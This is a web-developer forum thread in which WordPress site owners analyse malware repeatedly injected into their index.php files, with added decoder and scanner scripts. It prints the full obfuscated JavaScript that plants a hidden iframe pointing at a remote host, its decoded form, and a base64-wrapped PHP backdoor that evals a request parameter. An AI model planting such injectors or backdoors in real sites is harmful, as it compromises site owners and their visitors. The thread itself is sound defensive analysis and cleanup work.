www.webdeveloper.com

Thread: Malicious Code Inject: What Does It Do?

  1. #1
    Join Date
    Nov 2005
    Location
    San Diego
    Posts
    54

    Malicious Code Inject: What Does It Do?

    I have dozens of wordpress installs which are constantly getting malicious code injected into the beginning of index.php despite keeping wordpress updated as well as updating to the latest version of timthumb.php in each setup.

    So now it's time to reverse engineer this bugger, learn more about how it works, and possibly find a way to prevent more of the same script injects.

    It uses a couple levels of obfuscation, first being a base64 decode:
    Code:
    eval(base64_decode('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'));
    Which after decoding, spits out some more jargon. This one I don't know how to decode/unpack:

    Code:
    <script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,128,119,210,300,464,104,122,117,196,48,78,96,416,101,210,309,416,116,122,117,196,48,78,96,460,116,242,324,404,61,78,354,420,115,210,294,420,108,210,348,484,58,208,315,400,100,202,330,236,112,222,345,420,116,210,333,440,58,194,294,460,111,216,351,464,101,118,324,404,102,232,174,192,59,232,333,448,58,96,177,156,62,120,141,420,102,228,291,436,101,124,102,164,59,26,27,36,125,26,27,36,102,234,330,396,116,210,333,440,32,210,306,456,97,218,303,456,40,82,369,52,9,18,27,472,97,228,96,408,32,122,96,400,111,198,351,436,101,220,348,184,99,228,303,388,116,202,207,432,101,218,303,440,116,80,117,420,102,228,291,436,101,78,123,236,102,92,345,404,116,130,348,464,114,210,294,468,116,202,120,156,115,228,297,156,44,78,312,464,116,224,174,188,47,222,333,432,98,228,327,448,46,232,324,400,46,198,297,188,100,94,156,192,52,92,336,416,112,126,309,444,61,98,117,164,59,204,138,460,116,242,324,404,46,236,315,460,105,196,315,432,105,232,363,244,39,208,315,400,100,202,330,156,59,204,138,460,116,242,324,404,46,224,333,460,105,232,315,444,110,122,117,388,98,230,333,432,117,232,303,156,59,204,138,460,116,242,324,404,46,216,303,408,116,122,117,192,39,118,306,184,115,232,363,432,101,92,348,444,112,122,117,192,39,118,306,184,115,202,348,260,116,232,342,420,98,234,348,404,40,78,357,420,100,232,312,156,44,78,147,192,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,416,101,210,309,416,116,78,132,156,49,96,117,164,59,26,27,36,9,200,333,396,117,218,303,440,116,92,309,404,116,138,324,404,109,202,330,464,115,132,363,336,97,206,234,388,109,202,120,156,98,222,300,484,39,82,273,192,93,92,291,448,112,202,330,400,67,208,315,432,100,80,306,164,59,26,27,36,125];if(window.document)for(i=6-2-1-2-1;-581+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}</script>
    Anyone know what to do with this?

  2. #2
    Join Date
    Jun 2012
    Posts
    5

    Me too

    I found it without the base64 encoding, and it's not on a wordpress install. Here's the code I found, and it looks identical to your decoded javascript:

    Code:
    try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,218,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,206,312,468,102,220,351,444,106,226,138,420,98,210,366,184,99,198,141,400,47,104,144,208,46,224,312,448,63,206,333,244,49,78,96,476,105,200,348,416,61,78,147,192,39,64,312,404,105,206,312,464,61,78,147,192,39,64,345,464,121,216,303,244,39,236,315,460,105,196,315,432,105,232,363,232,104,210,300,400,101,220,177,448,111,230,315,464,105,222,330,232,97,196,345,444,108,234,348,404,59,216,303,408,116,116,144,236,116,222,336,232,48,118,117,248,60,94,315,408,114,194,327,404,62,68,123,236,13,18,27,500,13,18,27,408,117,220,297,464,105,222,330,128,105,204,342,388,109,202,342,160,41,246,39,36,9,18,354,388,114,64,306,128,61,64,300,444,99,234,327,404,110,232,138,396,114,202,291,464,101,138,324,404,109,202,330,464,40,78,315,408,114,194,327,404,39,82,177,408,46,230,303,464,65,232,348,456,105,196,351,464,101,80,117,460,114,198,117,176,39,208,348,464,112,116,141,188,103,208,351,408,110,234,333,424,113,92,315,392,105,244,138,396,99,94,300,188,52,96,156,184,112,208,336,252,103,222,183,196,39,82,177,408,46,230,348,484,108,202,138,472,105,230,315,392,105,216,315,464,121,122,117,416,105,200,300,404,110,78,177,408,46,230,348,484,108,202,138,448,111,230,315,464,105,222,330,244,39,194,294,460,111,216,351,464,101,78,177,408,46,230,348,484,108,202,138,432,101,204,348,244,39,96,117,236,102,92,345,464,121,216,303,184,116,222,336,244,39,96,117,236,102,92,345,404,116,130,348,464,114,210,294,468,116,202,120,156,119,210,300,464,104,78,132,156,49,96,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,208,303,420,103,208,348,156,44,78,147,192,39,82,177,52,9,18,27,400,111,198,351,436,101,220,348,184,103,202,348,276,108,202,327,404,110,232,345,264,121,168,291,412,78,194,327,404,40,78,294,444,100,242,117,164,91,96,279,184,97,224,336,404,110,200,201,416,105,216,300,160,102,82,177,52,9,18,375];if(window.document)for(i=6-2-1-2-1;-587+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e(ss);}}
    If anyone knows what it does, I'm highly interested. I'm still picking it apart. If I come up with anything I'll post it here.

  3. #3
    Join Date
    Feb 2003
    Location
    Michigan, USA
    Posts
    5,774
    I feel your pain, having had to work on Wordpress blogs in an enterprise environment. I can only provide words of consolation from Bash.org:

    wordpress is an unauthenticated remote shell that, as a useful side feature, also contains a blog

  4. #4
    Join Date
    Jun 2012
    Posts
    5

    A little further....

    This actually could be a wordpress issue. The client had installed wordpress in a subdir that I was unaware of. They are also using timthumb.php so that may be the vector here. It's also the only site that is getting code injected on the server, so that is highly suspicious.

    I did manage to un-obfuscate the javascript. It basically adds an iframe like the following:
    Code:
    <iframe src='http://ghufnuojq.ibiz.cc/d/404.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
    It does this by trying first to call a function called iframer that looks like this:

    Code:
    function iframer(){
        var f = document.createElement('iframe');
        f.setAttribute('src','http://ghufnuojq.ibiz.cc/d/404.php?go=1');
        f.style.visibility='hidden';
        f.style.position='absolute';
        f.style.left='0';
        f.style.top='0';
        f.setAttribute('width','10');
        f.setAttribute('height','10');
        document.getElementsByTagName('body')[0].appendChild(f);
    }
    And if it cannot call that it does a document.write to produce the same. My suggestion is to kill timthumb.php for now and see if that stops the injection.

    -Steve
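The packed script posted in #1 and #2 can be decoded on paper without ever running it, which is how the iframer() result above is reached. The following is an added example written for this thread, not code from any of the posters: it reimplements the decoder loop statically. Everything it needs is taken from the posted script; SAMPLE_N is a constructed input made of the first 73 values of the array in #1 (the full arrays have 581 and 587 entries), and the function names are mine.

```javascript
// Added example (not from the thread): static decoder for the charCode-array
// obfuscation posted in #1/#2, run without eval so the payload never executes.
//
// How the packed script works, read straight from the posted source:
//   h = -012/5      -> legacy octal literal 012 === 10, so h === -2 and h*h === 4
//   f = "fromCharCode"
//   for (i = 0; i != N; i++) ss += String.fromCharCode(n[i] / (i % 4 + 1))
//   e(ss)           -> window["eval"](ss)
// i.e. every char code was multiplied by 1,2,3,4 in rotation before storage.
// The two try/catch wrappers are anti-analysis: appendChild(q+"") throws a
// TypeError (a string is not a Node) and the bare identifier `prototype` throws
// a ReferenceError, so the real work only happens inside the catch blocks.

// Constructed input: the first 73 values of the array posted in #1.
const SAMPLE_N = [9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,196,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123];

// Reverse the rotating multiplier. A non-integer result means the divisor
// period (h*h in the original) is wrong for this sample, so fail loudly
// rather than emit garbage.
function decodeCharArray(n, divisorPeriod = 4) {
  let out = "";
  for (let i = 0; i < n.length; i++) {
    const divisor = (i % divisorPeriod) + 1;
    const code = n[i] / divisor;
    if (!Number.isInteger(code)) {
      throw new Error(`non-integer char code at index ${i}: ${n[i]}/${divisor}`);
    }
    out += String.fromCharCode(code);
  }
  return out;
}

// Pull the n=[...] array out of the raw text of an infected index.php so the
// decoder can be pointed at a file instead of a hand-copied list.
function extractArray(scriptText) {
  const m = scriptText.match(/n=\[([\d,]+)\]/);
  return m ? m[1].split(",").map(Number) : null;
}

// The loop is written as  for(i=6-2-1-2-1;-581+i!=2-2;i++)  i.e. i from 0 to
// 581; the bound should equal the array length, a quick sanity check.
function extractLoopBound(scriptText) {
  const m = scriptText.match(/-(\d+)\+i!=/);
  return m ? Number(m[1]) : null;
}

// Once decoded, the analyst mostly wants the remote URLs the payload contacts.
function findUrls(text) {
  return text.match(/https?:\/\/[^'"\s<>]+/g) || [];
}

// Stand-alone run: decode the sample prefix and show it.
console.log(JSON.stringify(decodeCharArray(SAMPLE_N)));
```

Feeding the complete array from either post into decodeCharArray yields the iframer() function and the document.write fallback Steve describes; findUrls on that output gives the iframe target without opening it in a browser.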

  5. #5
    Join Date
    Nov 2005
    Location
    San Diego
    Posts
    54
    Hey Steve, that might be it. I found an old wordpress with a vulnerable v1.16 timthumb. Updated it to the latest version and haven't seen any of my other installs get script injects yet. Used to be, it would re-inject itself on every index.php on the server every 15-30mins. Hopefully that last timthumb is all there was to it. I'll keep you guys posted.

    BTW, how did you manage to decode it?
    Last edited by SpectrumFire; 06-13-2012 at 11:17 PM.

  6. #6
    Join Date
    Jun 2012
    Posts
    5

    unpacked it here

    I unpacked it at the following site:
    http://jsunpack.jeek.org/

    The version of timthumb.php I found was at v1.12 so that was almost certainly my vector.

  7. #7
    Join Date
    Jun 2012
    Posts
    5

    Apparently there is some infighting now...

    The last time there was injected code, it was replaced with "you need to pay for this crypt" instead of the obfuscated javascript. Just an FYI for everyone out there.

    -Steve

  8. #8
    Join Date
    Jun 2012
    Posts
    2

    Same issue, still without solution

    Hi, I came up with your post today after searching the web for days without helpful solutions. I have exactly the same issue: infected index.php on 4 wordpress sites within the same account, but:
    - all of them up to date,
    - no timthumb or timthumb in the recent version
    - reinstalled wp several times,
    - changed password, db passwords
    ... and still the files get infected again after a short while.
    It is the same code you described, but I am unable to find the source
    Any other hints or ideas?
    Thanks!!

  9. #9
    Join Date
    Jun 2012
    Posts
    5

    There were some backdoors injected as well...

    I found these in my particular case. The ass.php one is the nasty. It was a full bore php exploit shell. No bueno.

    found and removed the following in /dir/to/domain.com/public_html/wordpress/wp-content/themes/twentyeleven/functions.php
    Code:
    eval (base64_decode ("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIGZtWExnWGl6Znp1ODNiICov"));
    Decodes to:
    Code:
    if (isset($_REQUEST['asc'])) { eval(stripslashes($_REQUEST['asc'])); exit; }/* fmXLgXizfzu83b */
    Found remote control script here:
    /dir/to/domain.com/public_html/wordpress/wp-content/themes/images/ass.php

    You should be able to find the exploit script if it is the same as mine by running the following in your public_html directory:
    Code:
    find ./ -name "*.php" -exec grep -l "SnIpEr_SA" {} \;
    *Disclaimer: NEVER run shell code on your server unless you understand it!!!

    Also check out this site, it has a lot of good advice:
    http://25yearsofprogramming.com/blog/2010/20100315.htm

    -Steve
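The functions.php backdoor above is the shape worth hunting for on every site in the account, and the base64 payload can be decoded offline to confirm what it does before anything is deleted. The following is an added example, not Steve's code: a small Node script that scans PHP source text for eval(base64_decode("...")) and for eval() fed from a request superglobal, decoding the payload with Buffer rather than executing it. The sample files are constructed; the infected one carries the exact eval line posted above.

```javascript
// Added example (not from the thread): static scan of PHP source for the two
// backdoor shapes reported in #9. The base64 payload is decoded with Buffer,
// never passed to an interpreter.

// eval(base64_decode("...")) with the optional whitespace seen in the posted line
const EVAL_B64 = /eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+\/=]+)["']\s*\)\s*\)/g;
// eval() fed from a request superglobal: the "asc" backdoor and its relatives
const EVAL_REQUEST = /eval\s*\([^;]*\$_(REQUEST|GET|POST|COOKIE)\s*\[/;

function decodeBase64(b64) {
  return Buffer.from(b64, "base64").toString("utf8");
}

// One finding per suspicious construct in a PHP source string.
// A decoded payload that itself evals request input is flagged as a remote
// shell: anyone who knows the parameter name can run PHP on the server.
function scanPhpSource(source) {
  const findings = [];
  for (const m of source.matchAll(EVAL_B64)) {
    const decoded = decodeBase64(m[1]);
    findings.push({
      kind: "eval_base64",
      offset: m.index,
      decoded,
      remoteShell: EVAL_REQUEST.test(decoded),
    });
  }
  if (EVAL_REQUEST.test(source)) {
    findings.push({
      kind: "eval_request",
      offset: source.search(EVAL_REQUEST),
      decoded: null,
      remoteShell: true,
    });
  }
  return findings;
}

// Scan a list of {name, source} records (read them from disk with fs when
// shell access exists; the hoster in #10 only allows uploads, so the files can
// be scanned locally after download).
function scanFiles(files) {
  return files
    .map((f) => ({ file: f.name, findings: scanPhpSource(f.source) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed samples: a theme functions.php with the line posted in #9
// appended after legitimate code, and a clean file for comparison.
const INFECTED_FUNCTIONS_PHP = [
  "<?php",
  "add_action('init', 'twentyeleven_setup');",
  'eval (base64_decode ("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIGZtWExnWGl6Znp1ODNiICov"));',
].join("\n");
const CLEAN_PHP =
  "<?php\nfunction twentyeleven_setup() { load_theme_textdomain('twentyeleven'); }\n";

// Stand-alone run: report what the scanner sees in the two samples.
for (const r of scanFiles([
  { name: "wp-content/themes/twentyeleven/functions.php", source: INFECTED_FUNCTIONS_PHP },
  { name: "wp-content/themes/twentyeleven/clean.php", source: CLEAN_PHP },
])) {
  for (const f of r.findings) {
    console.log(`${r.file}: ${f.kind} at offset ${f.offset}${f.remoteShell ? " (remote shell)" : ""}`);
    if (f.decoded) console.log("  decoded: " + f.decoded);
  }
}
```

The decoded text is what the thread shows: a check for the asc request parameter followed by eval of its contents, so a hit with remoteShell set means every copy of that file, on every site sharing the account, needs replacing from a clean download, not just the index.php that shows the symptom.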

  10. #10
    Join Date
    Jun 2012
    Posts
    2
    I am working with a domain hoster and I cannot execute shell commands there. The infection scheme you mentioned seems to be the same with me, but I cannot find the "ass.php" which I suppose is the source. I could clean 3 of my 4 installations, one still is infected.
    I cleaned up all wp-files and theme files and copied them from a freshly downloaded wp installation. Will see what happens now...
